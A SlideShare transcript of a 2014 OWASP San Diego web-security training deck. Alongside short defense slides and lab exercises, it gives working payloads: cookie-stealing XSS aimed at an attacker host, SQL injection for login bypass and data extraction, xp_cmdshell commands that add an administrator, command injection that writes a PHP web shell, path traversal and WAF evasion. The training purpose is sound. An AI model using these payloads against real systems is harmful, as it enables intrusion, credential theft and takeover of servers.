OWASP San Diego Training Presentation
Upcoming SlideShare
Loading in...5
×
 

OWASP San Diego Training Presentation

on

  • 338 views

OWASP San Diego Training Slides from May, 2014

OWASP San Diego Training Slides from May, 2014

Statistics

Views

Total Views
338
Views on SlideShare
337
Embed Views
1

Actions

Likes
3
Downloads
20
Comments
0

1 Embed 1

http://www.slideee.com 1

Accessibility

Categories

Upload Details

Uploaded via as Microsoft PowerPoint

Usage Rights

© All Rights Reserved

Report content

Flagged as inappropriate Flag as inappropriate
Flag as inappropriate

Select your reason for flagging this presentation as inappropriate.

Cancel
  • Full Name Full Name Comment goes here.
    Are you sure you want to
    Your message goes here
    Processing…
Post Comment
Edit your comment

    OWASP San Diego Training Presentation OWASP San Diego Training Presentation Presentation Transcript

    • <script> alert(‘OWASP Training’); </script>
    • Warning: This Presentation Is Intended For Educational Purposes Only
    • Setup Web Communication SQL Basics HTTP/HTTPS Overview Tools Other related technologies XSS CSRF URL Redirect Local File Inclusion (LFI) Remote File Inclusion (RFI) Direct Object Access SQL Injection Command Injection Javascript Server Side Injection Topics
    • Kali Linux Firefox plugins ◦ Web Developer ◦ User-Agent Switcher ◦ Firebug ◦ SOA Client Setup Check
    • Setup https://172.17.0.42/dvwa/ Username: admin Password: ***** Exercise - DVWA Portal
    • Basic Web Communication
    • Client → Server Client sends a request Server sends back a response E.g. Web Browser → Web Server (Port 80) ◦ Web Server → Postgres Database to fetch data ⚫Returns data to Web Server to process and render to Web Browser Basic Web Communication
    • Web Request Basic Web Communication GET / HTTP/1.1 Host: api.bonfire-project.eu:444 Accept: */* Authorization: Basic XXX Accept-Encoding: gzip, deflate
    • Web Response Basic Web Communication HTTP/1.1 200 OK Vary: Authorization,Accept Transfer-Encoding: chunked Etag: "fa2ba873343ba638123b7671c8c09998" Content-Type: application/vnd.bonfire+xml; charset=utf-8 Date: Wed, 01 Jun 2011 14:59:30 GMT Server: thin 1.2.11 codename Bat-Shit Crazy Allow: GET,OPTIONS,HEAD Cache-Control: public,max-age=120 Connection: close <?xml version="1.0" encoding="UTF-8"?> <root xmlns="http://api.bonfire- project.eu/doc/schemas/occi" href="/"> <version>0.8.9</version> <timestamp>1306940370</timestamp> <link rel="experiments" href="/experiments" type="application/vnd.bonfire+xml"/> <link rel="locations" href="/locations" type="application/vnd.bonfire+xml"/> <link rel="users" href="/users" type="application/vnd.bonfire+xml"/> </root>
    • Example using Burpsuite (Repeater)… DEMO - Request/Response
    • GET POST HEAD TRACE PUT DELETE CONNECT OPTIONS HTTP Methods
    • 100 (Informational) 200 (Success) 300 (Redirect) 400 (Client Error) 500 (Server Error) HTTP Response Codes
    • http://www.victim.com/page.aspx?parameter1=tes t&parameter2=test#location=3 HTTP URI/URL
    • Database communication Web Server communicates to DB to fetch data SQL or a SQL abstraction layer is used SQL = Structured Query Language Basic Web Communication
    • Example Relational SQL DB
    • SELECT INSERT UPDATE DELETE Types Of SQL Statements
    • SELECT column_name FROM table_name WHERE column_name=“value” ORDER BY column_name DESC SELECT “random string” SELECT “random string” FROM DUAL SeLeCt Price where ISBN_NO = ‘0201703092’; SELECT Statement
    • Weak Passwords Open Directories Client Side Security Detailed Error Messages Insecure Configuration
    • https://172.17.0.145/Web2/ Client-Side Security - Exercise https://172.17.0.145/CrackGomezsPassword/ Demo… EXERCISE – Insecure config.
    • HTTPS Communication
    • SSL/TLS Versions: SSLv2, SSLv3, TLS1.0, TLS1.1, TLS1.2 Key Exchange Mechanisms: RSA, DH, DHE/EDH, ECDHE, … Authentication Mechanisms: RSA, … Encryption Algorithms: RC4, DES, AES, IDEA, SEED, … Encryption Modes: CBC, ECB, GSM, Counter, … HTTPS Overview
    • HTTPS = HTTP over TLSv1.0, TLSv1.2 or SSLv3 * are optional CLIENT SERVER ClientHello -----> [ServerHello Certificate * <----- ServerKeyExchange * CertificateRequest *] Certificate * ClientKeyExchange -----> CertificateVerify * <----- Finished Application Data <-----> Application Data HTTPS Overview
    • HTTPS Overview
    • HTTPS Overview
    • Burpsuite
    • Demo/Exercise Burpsuite
    • Web Developer Toolbar
    • Firebug
    • IE Developer Toolbar (F12)
    • User Agent Switcher
    • Download user agent xml list ◦ http://techpatterns.com/forums/about304.html User Agent Switcher
    • SOA Client
    • XML HTTP Request (XHR) ◦ XML HTTP header Javascript Serialized Object Notation (JSON) ◦ Way of representing data ◦ { “Firstname”: “Jake”, “lastname”: “Jones” } SOAP ◦ Look for asmx files or asmx?WSDL ◦ Could be server to server or client to server REST ◦ Parameters specified in url ◦ If you don’t have documentation you can try and guess the REST parameters Other HTTP Related Technologies
    • Reflected XSS Stored XSS Dom Based XSS Cross-Site Scripting (XSS)
    • http://192.168.1.124/WackoPicko/pictures/search. php?query=%3Cscript%3Ealert%281%29%3C%2 Fscript%3E&x=0&y=0 Reflected XSS can be in POST Reflected XSS
    • Can be in user agent Could be in cookie Use to be able to control a lot of HTTP headers in flash Reflected XSS
    • Html and or Javascript is stored on the server and can be later accessed by a user Stored XSS
    • User input is gathered by javascript and reflected back to the page Try exploits with IE (or safari mobile…) Dom Based XSS
    • Put canary value in http://victim.com/id=yoyoyo Use web developer toolbar to view generated source Check to see where the canary is in the source Check to see if html encoding is being used or what characters are available ◦ http://victim.com/id=yoyoyo< Sploit if possible Finding XSS
    • <script>var+i=new+Image;+i.src="http://192.168.1. 120"%2bdocument.cookie;</script> <SCRIPT SRC=HTTP://ATTACKER.COM/AAA.JS></SCRIP T> Exploiting XSS Vulns
    • Host XSS javascript files or resources on Apache Server Or start python server ◦ python –m SimpleHTTPServer SimpleHTTPServer can be easily wrapped using ssl library in python Exploiting XSS Vulns
    • Browser Exploitation Framework (BeEF) Exploiting XSS Vulns
    • HTMLEncode All Output Be Careful where user output is placed in HTML ◦ <html>HTML encoding won’t save you here<script src=http://[user_controled_input]></script></html> Do NOT write user input into javascript section of page XSS Defense
    • https://172.17.0.42/dvwa/ XSS Reflect exercise EXERCISE - XSS
    • Request on behalf of attacker https://victim.com/change_password.asp?userna me=admin&password=mypassword123 If tokens are not random they can be guessed or bruteforced CSRF can be in GET or POST Cross Site Request Forgery (CSRF)
    • CSRF Tokens ◦ Generate random tokens ◦ Make sure you check your tokens ☺ CSRF Defense
    • https://victim.com/login.asp?landing_page=/user.a sp https://victim.com/login.asp?landing_page=http://w ww.google.com URL Redirect
    • If you can’t use http try https If you can’t use http or https try //google.com URL Redirect
    • Redirecting to other pages within the site can still be considered a vulnerability For example, when combining the attack with other attacks like XSS, CSRF, out of band SQL injection, or command injection https://victim.com/login.aspx?page=user.aspx?par am=<script>alert(1)</script> URL Redirect
    • URL Redirect can be used to steal session information in the URL by analyzing the refer header https://victim.com/login?page=http://attacker.com https://victim.com/login?page=http://attacker.com& jsessionId=AB21CF40A3BD698 URL Redirect
    • Store location of redirect(s) on the server Create whitelist of possible URLs to redirect to URL Redirect
    • PHP functions ◦ include() ◦ include_once() ◦ require() ◦ require_once() ◦ fopen() Local File Inclusion
    • ../../../../../../../../../../../etc/passwd ........................windowswin.ini ................boot.ini .././.././.././.././.././../etc/passwd %2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e% 2fetc%2fpasswd Local File Inclusion
    • Typically Java and .NET LFI vulns will not allow access outside of web root folder Instead of trying ../../../../../../../../../../../etc/passwd first try ../index.jsp or ../../scripta.js Local File Inclusion
    • Harden php.ini file and other configuration files Make sure web directories are not writable Don’t trust user input for file operations LFI Defense
    • https://172.17.0.42/dvwa/ File Inclusion exercise EXERCISE - LFI
    • Whether to allow the treatment of URLs (like http:// or ftp://) as files. http://victim.com/allow-url-fopen allow_url_fopen = On Whether to allow include/require to open URLs (like http:// or ftp://) as files. http://victim.com/allow-url-include allow_url_include = On Remote File Inclusion
    • Go straight to file Directory listing helps a lot Can use burp intruder Check robots.txt Dirbuster Burp engagement Direct Object Access
    • SQL is standard query language implemented by several organizations MySQL MSSQL Oracle Postgres DB2 SQL Injection
    • Error Union Blind Bypass (eg. Authentication Bypass) Types Of SQL Injection
    • ' " ') ))))))))) ; ' " -- ' or 1=1 -- ' and 1=2 -- %27 %2527 %22 # /**/ ' waitfor delay '0:0:20'-- '+waitfor+delay+'0:0:20'+-- ' (select sleep(20)) – - ‘ (select pg_sleep(20))-- '/**/(select/**/sleep(20))/**/--%20 or 1=(select benchmark(1000000,MD5(‘A’)))-- convert(varchar,0x7b5d) chr(0xbf).chr(0x27) Triggering SQL Injection
    • Places to try when trying to trigger a SQL injection: ◦ GET parameters ◦ POST parameters ◦ HEAD parameters (Blind injection only) ◦ Cookie ◦ Refer header ◦ Agent ID ◦ SOAP parameters ◦ JSON parameters Try using Burp to defeat client side (javascript) SQL injection protections Triggering SQL Injection
    • admin‘ or 1=1 –- admin‘ or ‘1’=‘1 admin‘/**/or/**/2/**/LiKe/**/2--/**/ SELECT username, password from users WHERE username = ‘admin’ and password = ‘admin’; SELECT username, password from users WHERE username = ‘admin‘ or 1=1 –- ’ and password = ‘admin’ SQL Injection Authentication Bypass
    • https://172.17.0.42/owaspbricks/login-1/ exercise EXERCISE – SQL Injection Auth. Bypass
    • https://172.17.0.42/owaspbricks/login-2/ exercise EXERCISE – SQL Injection Auth. Bypass
    • https://172.17.0.145/Web1/ exercise EXERCISE – SQL Injection Auth. Bypass
    • Errors must be turned on in configuration of database or exceptions in code are not handled properly and are printed back to the user Goal is to make database throw an error message and print back the error message with valuable data in it ERROR Based SQL Injection
    • http://victim.com/showmovies.aspx?name=rad' and 1=0/@@version -- Server Error in '/' Application. Syntax error converting the nvarchar value 'Microsoft SQL Server 2000 – 8.00.760 (Intel X86) Dec 17 2002 14:22:05 Copyright © 1988-2003 Microsoft Corporation Enterprise Edition on Windows NT 5.2 (Build 3790: )' to a column of datatype int. Description: An unhandled exception occurred during the execution of the current web request. Please review the stack trace for more information about the error and where it originated in the code. ERROR Based SQL Injection
    • (MSSQL) Get column name http://victim.com/showmovies.aspx?name=rad' having '1'='1 WEBUSERS.UserID Get next column name http://victim.com/showmovies.aspx?name=rad' group by UserID having '1'='1 WEBUSERS.Username ERROR Based SQL Injection
    • Error Based SQLi MySQL http://victim.com/showmovies.php?name=rad' and ExtractValue(1,CONCAT(0x5c, (SELECT @@version))) --%20 ‘ XPATH syntax error: ‘5.1.41-3ubuntu12.6-log’ ERROR Based SQL Injection
    • For Oracle Error Based SQL Injection use utl_inaddr.get_host_name() function http://victim.com/showmovies.jsp?name=rad' and (utl_inaddr.get_host_name((select+sys.database_name+ from+dual)))=1 -- ORA-29257: host MOVIE_DATABASE unknown ORA-06512: at 'SYS.UTL_INADDR' line 4 ORA-06512: at 'SYS.UTL_INADDR' line 35 ORA-06512: at line 1 ERROR Based SQL Injection
    • Sometimes the utl_inaddr.get_host_name() function can produce the following error: ◦ ORA-24247: network access denied by access control list (ACL) The following technique will work regardless of network restrictions/permissions (select%201%20from%20dual%20where%201=1 %20and%201=length(extractvalue(xmltype('<x/>' ),'/$'||(select%20user%20from%20dual)))) ERROR Based SQL Injection
    • Postgres http://victim.com/showmovies.do?name=rad' and 1=cast(version() as int)-- ERROR: invalid input syntax for integer “PostgreSQL 8.3.7 on i686-pc-linux-gnu, compiled by GCC gcc (GCC) 4.1.2 20071124 (Red Hat 4.1.2-42)” ERROR Based SQL Injection
    • https://172.17.0.42/dvwa/ → SQL Injection Demo/Exercise – Error based SQL Injection
    • Find columns ◦ ‘ order by 2 -- Find columns that return data ◦ ‘ union select 1,2 -- Extract data using column ◦ ‘ union select 1,@@version -- Union Based SQL Injection
    • https://172.17.0.42/dwa/ → SQL Injection Demo/Exercise – Union based SQL Injection
    • When entering a sqli trigger you get a generic error or redirect (HTTP 200, 302, 500) To confirm the sql injection try using a time based delay ◦ waitfor delay '0:0:20' -- (MS SQL) ◦ benchmark(100000000, rand()),1) -- (MySQL) ◦ select sleep(20) -- (MySQL (version 5.0.12 and later)) ◦ pg_sleep(20) -- (Postgres) ◦ 'a'||Utl_Http.request('http://madeupserver.com') -- (Oracle) ◦ dbms_lock.sleep(20) -- (Oracle (Only DBA, requires plsql injection and doesn’t work in where clause)) Blind SQL Injection
    • Examples of confirming SQL Injection http://victim.com/showmovies.aspx?name=rad' waitfor delay '0:0:20' -- http://victim.com/showmovies.php?name=rad' or 1= (select sleep(20)) --%20 http://victim.com/showmovies.do?name=rad' pg_sleep(20) -- http://victim.com/showmovies.jsp?name=rad' 'a'||Utl_Http.request('http://madeupserver.com') -- Blind SQL Injection
    • Other methods for confirming Blind SQL Injection Try using addition or subtraction ◦ http://victim.com/showmovies.aspx?id=2 ◦ http://victim.com/showmovies.aspx?id=3-1 ◦ http://victim.com/showmovies.aspx?id=1%2b1 Try using a comment ◦ http://victim.com/showmovies.aspx?name=rad' -- ◦ http://victim.com/showmovies.aspx?id=1 /**/ Try a percent sign or a statement that evaluates to true and/or false ◦ http://victim.com/showmovies.aspx?name=% ◦ http://victim.com/showmovies.aspx?name=rad' or 1=1 -- ◦ http://victim.com/showmovies.aspx?name=rad' and 1=2 -- Try string concatenation ◦ (MSSQL) http://victim.com/showmovies.aspx?name=ra'%2b‘d ◦ (Oracle) http://victim.com/showmovies.jsp?name=ra'||'d ◦ (MySQL) http://victim.com/showmovies.php?name=ra' 'd Blind SQL Injection
    • Extracting Data (TRUE or FALSE) http://victim.com/showmovies.aspx?name=rad' ;if is_srvrolemember('sysadmin')=1 waitfor delay '0:0:20'-- http://victim.com/showmovies.aspx?name=rad';if @@version like '%252005%25' waitfor delay '0:0:20' -- Blind SQL Injection
    • LIKE technique http://victim.com/search.aspx?id=1';if SYSTEM_USER like '%25a%25' waitfor delay '0:0:12'-- (TRUE) (contains 'a') http://victim.com/search.aspx?id=1';if SYSTEM_USER like '%25e%25' waitfor delay '0:0:12'-- (TRUE) (contains 'e') http://victim.com/search.aspx?id=1';if SYSTEM_USER like '%25o%25' waitfor delay '0:0:12'-- (TRUE) (contains 'o') http://victim.com/search.aspx?id=1';if SYSTEM_USER like '%25p%25' waitfor delay '0:0:12'-- (TRUE) (contains 'p') Blind SQL Injection
    • LIKE technique Continued http://victim.com/search.aspx?id=1';if SYSTEM_USER like '%25r%25' waitfor delay '0:0:12'-- (TRUE) (contains 'r') http://victim.com/search.aspx?id=1';if SYSTEM_USER like '%25s%25' waitfor delay '0:0:12'-- (TRUE) (contains 's') http://victim.com/search.aspx?id=1';if SYSTEM_USER like '%25u%25' waitfor delay '0:0:12'-- (TRUE) ( contains 'u' ) http://victim.com/search.aspx?id=1';if SYSTEM_USER like '%25w%25' waitfor delay '0:0:12'-- (TRUE) ( contains 'w' ) http://victim.com/search.aspx?id=1';if SYSTEM_USER like '%25_%25' waitfor delay '0:0:12'-- (TRUE) ( contains '_' ) (aeoprsuw_) Blind SQL Injection
    • LIKE Technique Continued http://victim.com/search.aspx?id=1';if SYSTEM_USER like 'o%25' waitfor delay '0:0:12'-- (TRUE) ( starts with 'o') http://victim.com/search.aspx?id=1';if SYSTEM_USER like 'ow%25' waitfor delay '0:0:12'-- (TRUE) ( starts with 'ow') http://victim.com/search.aspx?id=1';if SYSTEM_USER like 'owa%25' waitfor delay '0:0:12'-- (TRUE) ( starts with 'owa') http://victim.com/search.aspx?id=1';if SYSTEM_USER like 'owas%25 waitfor delay '0:0:12'-- (TRUE) ( starts with 'owasp') Blind SQL Injection
    • LIKE Technique Continued http://victim.com/search.aspx?id=1';if SYSTEM_USER like 'owasp%25' waitfor delay '0:0:12'-- (TRUE) ( starts with 'owasp') http://victim.com/search.aspx?id=1';if SYSTEM_USER like 'owasp_%25' waitfor delay '0:0:12'-- (TRUE) (starts with 'owasp_') http://victim.com/search.aspx?id=1';if SYSTEM_USER like 'owasp_u%25' waitfor delay '0:0:12'-- (TRUE) (user is 'owasp_u') http://victim.com/search.aspx?id=1';if SYSTEM_USER like 'owasp_us%25' waitfor delay '0:0:12'-- (TRUE) (user is 'owasp_us') http://victim.com/search.aspx?id=1';if SYSTEM_USER like 'owasp_use%25' waitfor delay '0:0:12'-- (TRUE) (user is 'owasp_use') http://victim.com/search.aspx?id=1';if SYSTEM_USER like 'owasp_user' waitfor delay '0:0:12'-- (TRUE) (user is 'owasp_user') Blind SQL Injection
    • Binary Search Technique http://victim.com/search.aspx?id=1';if ASCII(SUBSTRING(SYSTEM_USER,1,1)) <127 waitfor delay'0:0:20'-- TRUE http://victim.com/search.aspx?id=1';if ASCII(SUBSTRING(SYSTEM_USER,1,1)) <63 waitfor delay'0:0:20'-- FALSE http://victim.com/search.aspx?id=1';if ASCII(SUBSTRING(SYSTEM_USER,1,1)) <95 waitfor delay'0:0:20'-- FALSE http://victim.com/search.aspx?id=1';if ASCII(SUBSTRING(SYSTEM_USER,1,1)) <110 waitfor delay'0:0:20'-- FALSE Blind SQL Injection
    • Binary Search Technique Continued http://victim.com/search.aspx?id=1';if ASCII(SUBSTRING(SYSTEM_USER,1,1)) <119 waitfor delay'0:0:20'-- TRUE http://victim.com/search.aspx?id=1';if ASCII(SUBSTRING(SYSTEM_USER,1,1)) <114 waitfor delay'0:0:20'-- TRUE http://victim.com/search.aspx?id=1';if ASCII(SUBSTRING(SYSTEM_USER,1,1)) <112 waitfor delay'0:0:20'-- FALSE http://victim.com/search.aspx?id=1';if ASCII(SUBSTRING(SYSTEM_USER,1,1)) =111 waitfor delay'0:0:20'-- TRUE 111 (ASCII (DECIMAL)) First char is o Blind SQL Injection
    • Logical AND (&) Technique (break out the ascii chart) How logical AND operator works ◦ 1 & 1 = 1 ◦ 1 & 0 = 0 ◦ 0 & 1 = 0 ◦ 0 & 0 = 0 ◦ 1100 & 0110 = 0100 This technique will extract one bit at a time (8 requests per byte) Blind SQL Injection
    • Ascii Character 'o' is HEX 6F and binary 0110 1111 Since ascii characters are 128 bits long we will AND each character with 128 (1000 0000), 64 (0100 0000), 32 (0010 0000), 16 (0001 0000), 8 (0000 1000), 4 (0000 0100), 2 (0000 0010), 1 (0000 0001) If we do a logical AND with each bit and delay a certain number of seconds if the result of the logical AND equals 1 then we should get NO-DELAY, DELAY, DELAY, NO-DELAY DELAY, DELAY, DELAY, DELAY Blind SQL Injection
    • http://victim.com/search.aspx?id=1';if ASCII(SUBSTRING(SYSTEM_USER,1,1)) & 128=128 waitfor delay'0:0:20'-- FALSE (NO-Delay) http://victim.com/search.aspx?id=1';if ASCII(SUBSTRING(SYSTEM_USER,1,1)) & 64=64 waitfor delay'0:0:20'-- TRUE (Delay) http://victim.com/search.aspx?id=1';if ASCII(SUBSTRING(SYSTEM_USER,1,1)) & 32=32 waitfor delay'0:0:20'-- TRUE (Delay) http://victim.com/search.aspx?id=1';if ASCII(SUBSTRING(SYSTEM_USER,1,1)) & 16=16 waitfor delay'0:0:20'-- FALSE (NO-Delay) Blind SQL Injection
    • http://victim.com/search.aspx?id=1';if ASCII(SUBSTRING(SYSTEM_USER,1,1)) & 8=8 waitfor delay'0:0:20'-- TRUE (Delay) http://victim.com/search.aspx?id=1';if ASCII(SUBSTRING(SYSTEM_USER,1,1)) & 4=4 waitfor delay'0:0:20'-- TRUE (Delay) http://victim.com/search.aspx?id=1';if ASCII(SUBSTRING(SYSTEM_USER,1,1)) & 2=2 waitfor delay'0:0:20'-- TRUE (Delay) http://victim.com/search.aspx?id=1';if ASCII(SUBSTRING(SYSTEM_USER,1,1)) & 1=1 waitfor delay'0:0:20'-- TRUE (Delay) Blind SQL Injection
    • The Logic AND technique will take roughly the same amount of requests on average as the binary search technique. However, the Logical AND technique does not depend on the previous request (ie. The requests are idempotent). This means when using the logical AND technique multiple requests can be made at the same time. Blind SQL Injection
    • Inference response based blind SQL Injection True or False based on the sites response or response data http://victim.com/search.aspx?id=1' and 1=1 -- (no 500) http://victim.com/search.aspx?id=1' and 1=1/0 -- (500) Blind SQL Injection
    • Oracle timing based SQL Injection (select 'a'||Utl_Http.request('http://madeupserver.com') from dual WHERE (SELECT username FROM all_users WHERE username='DBSNMP') = 'DBSNMP') -- Blind SQL Injection
    • Heavy Queries http://victim.com/search.aspx?id=1' and (light query) and (heavy query) Blind SQL Injection
    • Demo
    • Execute commands in MSSQL by using xp_cmdshell ' exec sp_configure 'show advanced options,1 –- ' ; RECONFIGURE –- ' exec sp_configure 'xp_cmdshell',1 – ' ; RECONFIGURE -- ' exec master..xp_cmdshell 'net user pwny pwnsauce /ADD' -- ' exec master..xp_cmdshell 'net localgroup Administrators pwny /ADD' – Metasploit and Core Impact both have modules for this that could help speed up exploitation and pivoting on a system SQL Injection Operating System
    • MySQL read file from filesystem ◦ select LOAD_FILE('/etc/passwd') MySQL write file to filesystem ◦ select 'this is a test' into outfile '/var/www/test.txt' SQL Injection Operating System
    • Parameterized Queries or Prepared Statements Don’t put user input into Order by clause. Order by clause is not usually supported with parameterized queries ◦ ASC and DESC are only two options. You can use if statement or sort output in javascript ◦ Can grab valid table names or values using a query then check to see if user input matches. Then concatenate with result from query SQL Injection Defense
    • https://victim.com/dnslookup.php?dnsentry=googl e.com https://victim.com/dnslookup.php?dnsentry=google. com;cat%20%2fetc%2fpasswd https://victim.com/dnslookup.php?dnsentry=google. com;cat /etc/passwd https://victim.com/dnslookup.php?dnsentry=blah;&& ls -l Command Injection
    • Commands ◦ google.com; ping -c 20 localhost ◦ google.com & ping -c 20 localhost ◦ google.com && ping -c 20 localhost ◦ google.com && ping -n 20 localhost ◦ google.com && ping -c 20 localhost # ◦ google.com && echo ‘<php …system(…)..’ > /var/www/site/cmd.php Command Injection
    • https://172.17.0.42/dvwa/ Command Execution EXERCISE – Command Injection
    • Upload a dynamic file (ie. php, asp, aspx, jsp, etc..) Run the dynamic code by going to the file using a web browser ◦ http://victim.com/uploads/shell.php Arbitrary File Upload
    • https://172.17.0.42/dvwa/ → Upload Use: https://172.17.0.144/downloads/ EXERCISE – Arbitrary File Upload
    • Cookie: admin=false Cookie: 139434 Cookie: logged_in=false Burp Sequencer can be used to identify non random cookie variables Session Manipulation and Session Hijacking
    • Padding Oracle Attack POET tool Session Manipulation and Session Hijacking
    • http://victim.com/login.php?SESSID=4v0rmq4gos aag63rla631gl5m2 http://victim.com/login.php?SESSID=aaaaaaaaaa aaaaaaaaaaaaaaaa Send to someone else to automatically set there cookie. Let them login and take over there session Session Fixation
    • Node.js Mongodb (NoSQL with javascript engine) CouchDB (NoSQL with javascript engine) Javascript Server Side Injection
    • POST/test/ HTTP/1.1 Host: 192.168.1.123 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:28.0) Gecko/20100101 Firefox/28.0 Accept: */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Connection: keep-alive response.end(‘pwnd’); Javascript Server Side Injection
    • response.end(‘<script>alert(1)</script>’); var fs = require(‘fs’); response.end(fs.readdrSync(‘c:’).toString()); var fs = require(‘fs’); response.end(fs.writeFileSync(‘c:secret.txt’,’littleSecr et’)); require(‘child_process’).spawn(‘c:windowssystem32 calc.exe’); response.end(‘success’); Javascript Server Side Injection
    • NoSQL databases use a key value hashing technique to store data NoSQL databases are not very strict on what data you can insert NoSQL databse implementations may or may not implement standard SQL NoSQL Injection
    • Try characters one by one in the GET or POST to see if specific characters are blocked WAFs very often drop your traffic (Burp will usually time out and your browser will show an error) Instead of ◦ or '1'='1'-- Try ◦ Or/**/'2'/**/LiKe/**/'2 Instead of ◦ waitfor delay '0:0:20’-- Try ◦ Wait+for+dElay+'0:0:20’-- Defeating IDS/IPS/WAF
    • Instead of ◦ admin Try ◦ char(0x61)%2bchar(0x64)%2bchar(0x6D)%2bchar(0x69) %2bchar(0x6E) Instead of ◦ ‘ union select password from users --%20 Try ◦ ‘(union(select(password)from(users))--((1)) Defeating IDS/IPS/WAF
    • Change GET to POST or POST to GET or Use HEAD Use IPv6 Change IPv4 version header to 5 (IPv5) HTTP Parameter Pollution ◦ http://victim.com/admin.php?userid=1&userid=2 ⚫ASP concatenates: 1,2 ⚫PHP takes last occurrence ⚫Java takes first occurrence Change Content Type ◦ Content-Type: multipart/; boundry=0000 ⚫(evasion of ModSecurity CRS) Defeating IDS/IPS/WAF
    • There are many ways in a database to do the same thing ◦ @@version ◦ version() ◦ select banner from v$version where banner like ‘Oracle%’ ◦ select version from v$instance Defeating IDS/IPS/WAF
    • Non alphanumeric xss ◦ eval("aler"+(!![]+[])[+[]])("xss") ◦ window[(+{}+[])[+!![]]+(![]+[])[!+[]+!![]]+([][+[]]+[])[!+[]+!![]+!![ ]]+(!![]+[])[+!![]]+(!![]+[])[+[]]] Defeating IDS/IPS/WAF
    • [][(![]+[])[!+[]+!![]+!![]]+([]+{})[+!![]]+(!![]+[])[+!![]]+(!![]+[])[+[]]][([]+{})[!+[]+!![]+!![]+!![]+!![]]+([]+{})[+!![]]+([][[]]+[])[+!![]]+(![]+[])[!+[]+!![]+!![]]+(!![]+[])[+[]]+(!![]+[])[+!![]]+([][[]]+ [])[+[]]+([]+{})[!+[]+!![]+!![]+!![]+!![]]+(!![]+[])[+[]]+([]+{})[+!![]]+(!![]+[])[+!![]]]((+{}+[])[+!![]]+(![]+[])[!+[]+!![]]+([][[]]+[])[!+[]+!![]+!![]]+(!![]+[])[+!![]]+(!![]+[])[+[]]+[][(![]+[])[!+[]+!![ ]+!![]]+([]+{})[+!![]]+(!![]+[])[+!![]]+(!![]+[])[+[]]][([]+{})[!+[]+!![]+!![]+!![]+!![]]+([]+{})[+!![]]+([][[]]+[])[+!![]]+(![]+[])[!+[]+!![]+!![]]+(!![]+[])[+[]]+(!![]+[])[+!![]]+([][[]]+[])[+[]]+([]+{})[! +[]+!![]+!![]+!![]+!![]]+(!![]+[])[+[]]+([]+{})[+!![]]+(!![]+[])[+!![]]]((!![]+[])[+!![]]+([][[]]+[])[!+[]+!![]+!![]]+(!![]+[])[+[]]+([][[]]+[])[+[]]+(!![]+[])[+!![]]+([][[]]+[])[+!![]]+([]+{})[!+[]+!![]+!![] +!![]+!![]+!![]+!![]]+([][[]]+[])[+[]]+([][[]]+[])[+!![]]+([][[]]+[])[!+[]+!![]+!![]]+(![]+[])[!+[]+!![]+!![]]+([]+{})[!+[]+!![]+!![]+!![]+!![]]+(+{}+[])[+!![]]+([]+[][(![]+[])[!+[]+!![]+!![]]+([]+{})[+!![]] +(!![]+[])[+!![]]+(!![]+[])[+[]]][([]+{})[!+[]+!![]+!![]+!![]+!![]]+([]+{})[+!![]]+([][[]]+[])[+!![]]+(![]+[])[!+[]+!![]+!![]]+(!![]+[])[+[]]+(!![]+[])[+!![]]+([][[]]+[])[+[]]+([]+{})[!+[]+!![]+!![]+!![]+!![] ]+(!![]+[])[+[]]+([]+{})[+!![]]+(!![]+[])[+!![]]]((!![]+[])[+!![]]+([][[]]+[])[!+[]+!![]+!![]]+(!![]+[])[+[]]+([][[]]+[])[+[]]+(!![]+[])[+!![]]+([][[]]+[])[+!![]]+([]+{})[!+[]+!![]+!![]+!![]+!![]+!![]+!![]]+(! []+[])[!+[]+!![]]+([]+{})[+!![]]+([]+{})[!+[]+!![]+!![]+!![]+!![]]+(+{}+[])[+!![]]+(!![]+[])[+[]]+([][[]]+[])[!+[]+!![]+!![]+!![]+!![]]+([]+{})[+!![]]+([][[]]+[])[+!![]])())[!+[]+!![]+!![]]+([][[]]+[])[!+[] +!![]+!![]])()([][(![]+[])[!+[]+!![]+!![]]+([]+{})[+!![]]+(!![]+[])[+!![]]+(!![]+[])[+[]]][([]+{})[!+[]+!![]+!![]+!![]+!![]]+([]+{})[+!![]]+([][[]]+[])[+!![]]+(![]+[])[!+[]+!![]+!![]]+(!![]+[])[+[]]+(!![]+[])[ +!![]]+([][[]]+[])[+[]]+([]+{})[!+[]+!![]+!![]+!![]+!![]]+(!![]+[])[+[]]+([]+{})[+!![]]+(!![]+[])[+!![]]]((!![]+[])[+!![]]+([][[]]+[])[!+[]+!![]+!![]]+(!![]+[])[+[]]+([][[]]+[])[+[]]+(!![]+[])[+!![]]+([][[]]+[ ])[+!![]]+([]+{})[!+[]+!![]+!![]+!![]+!![]+!![]+!![]]+([][[]]+[])[!+[]+!![]+!![]]+(![]+[])[!+[]+!![]+!![]]+([]+{})[!+[]+!![]+!![]+!![]+!![]]+(+{}+[])[+!![]]+([]+[][(![]+[])[!+[]+!![]+!![]]+([]+{})[+!![]]+(! ![]+[])[+!![]]+(!![]+[])[+[]]][([]+{})[!+[]+!![]+!![]+!![]+!![]]+([]+{})[+!![]]+([][[]]+[])[+!![]]+(![]+[])[!+[]+!![]+!![]]+(!![]+[])[+[]]+(!![]+[])[+!![]]+([][[]]+[])[+[]]+([]+{})[!+[]+!![]+!![]+!![]+!![]]+( !![]+[])[+[]]+([]+{})[+!![]]+(!![]+[])[+!![]]]((!![]+[])[+!![]]+([][[]]+[])[!+[]+!![]+!![]]+(!![]+[])[+[]]+([][[]]+[])[+[]]+(!![]+[])[+!![]]+([][[]]+[])[+!![]]+([]+{})[!+[]+!![]+!![]+!![]+!![]+!![]+!![]]+(![]+ [])[!+[]+!![]]+([]+{})[+!![]]+([]+{})[!+[]+!![]+!![]+!![]+!![]]+(+{}+[])[+!![]]+(!![]+[])[+[]]+([][[]]+[])[!+[]+!![]+!![]+!![]+!![]]+([]+{})[+!![]]+([][[]]+[])[+!![]])())[!+[]+!![]+!![]]+([][[]]+[])[!+[]+!![ ]+!![]])()(([]+{})[+[]])[+[]]+(!+[]+!![]+[])+(!+[]+!![]+!![]+!![]+!![]+!![]+!![]+!![]+[]))+(+!![]+[])+[][(![]+[])[!+[]+!![]+!![]]+([]+{})[+!![]]+(!![]+[])[+!![]]+(!![]+[])[+[]]][([]+{})[!+[]+!![]+!![]+!![] 